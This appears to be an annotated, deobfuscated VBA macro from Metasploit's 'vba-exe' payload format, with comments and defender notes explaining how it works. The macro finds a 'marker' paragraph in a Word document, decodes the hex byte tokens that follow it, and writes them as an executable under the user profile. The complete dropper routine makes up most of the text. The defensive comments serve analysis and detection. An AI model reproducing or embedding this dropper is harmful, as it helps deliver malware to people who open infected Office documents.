| ' This is a deobfuscated view of the 'vba-exe' output format of metasploit payload | |
| ' | |
| ' This macro searches for a marker paragraph, namely "marker" in the example below | |
| ' and then loads all paragraphs coming next, as a sequence of bytes, then saves it to | |
| ' a local file. | |
| ' | |
| ' Example, in the word document: | |
| ' marker | |
| ' &H4d&H5a&H90&H00&H03&H00&H00&H00&H04&H00&H00&H00 .... | |
| ' Writes the payload hidden in the document body to disk. Every paragraph after the | |
| ' one containing "marker" is read as a run of 4-character tokens (the "&H4d" form shown | |
| ' in the example above) and each token is written as one byte to | |
| ' %USERPROFILE%\whatever.exe. | |
| ' | |
| ' This Sub only drops the file; nothing in it runs the file, so any launch step is | |
| ' presumably in another routine - confirm against the full macro. | |
| ' | |
| ' Defender notes: the observable behaviour is an Office process creating an .exe under | |
| ' the user profile, and a document body holding long runs of &Hxx tokens after a marker | |
| ' paragraph. "marker" and "whatever.exe" look like placeholders in this deobfuscated | |
| ' view, so treat them as weak indicators and key detections on the behaviour instead. | |
| Sub DecodeAndSaveEmbeddedFile() | |
| Dim p As Paragraph | |
| Dim Text As String | |
| Dim MarkerFound As Boolean | |
| Dim Counter As Integer | |
| Dim FileHandle As Integer | |
| Dim b As Byte | |
| Dim UserProfile As String | |
| ' Drop location is taken from the USERPROFILE environment variable. | |
| UserProfile = Environ("USERPROFILE") | |
| FileHandle = FreeFile() | |
| ' Binary mode, so each Put below writes the raw byte value with no text translation. | |
| Open UserProfile + "\whatever.exe" For Binary As FileHandle | |
| For Each p In ActiveDocument.Paragraphs | |
| ' Yield to the host application on every paragraph while the loop runs. | |
| DoEvents | |
| Text = p.Range.Text | |
| ' MarkerFound is never reset, so every paragraph after the marker is decoded. | |
| If (MarkerFound = True) Then | |
| Counter = 1 | |
| ' Step through the paragraph text four characters at a time, one token per byte. | |
| While (Counter < Len(Text)) | |
| ' Assigning the 4-character string to a Byte relies on VBA's implicit conversion | |
| ' of "&Hxx" text to a number. | |
| b = Mid(Text, Counter, 4) | |
| Put #FileHandle, , b | |
| Counter = Counter + 4 | |
| Wend | |
| ' The marker paragraph itself is not decoded; it only arms the flag for the | |
| ' paragraphs that follow. | |
| ElseIf (InStr(1, Text, "marker") > 0 And Len(Text) > 0) Then | |
| MarkerFound = True | |
| End If | |
| Next | |
| Close #FileHandle | |
| End Sub |